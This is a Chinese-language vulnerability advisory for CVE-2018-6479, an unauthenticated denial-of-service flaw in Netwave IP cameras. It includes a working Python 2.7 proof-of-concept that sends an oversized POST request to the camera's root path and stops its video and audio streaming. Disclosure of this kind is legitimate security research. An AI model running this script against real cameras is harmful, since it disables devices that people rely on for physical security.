| CVE | 描述 |
|---|---|
| CVE-2018-6479 | 未认证的远程拒绝服务漏洞 |
| CVSS | 评分 | 详情 |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
在一次物联网安全研究中,在不同IP摄像头供应商的产品中发现了一些漏洞。Netwave IP Camera 是一个允许查看摄像头视频和管理摄像头的IP摄像头服务器。IP摄像头尤其用于物理安全和控制目的,因此其可用性至关重要。
任何 Netwave IP Camera 都可以通过向其根路径发送一个巨大的 POST 请求而被击垮。一旦发送该请求,设备将卡住并停止流式传输音频和视频。
概念验证:针对任何 NetWave IP Camera 运行以下 Python 2.7 脚本,摄像头将立即停止响应并停止流式传输视频/音频。
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León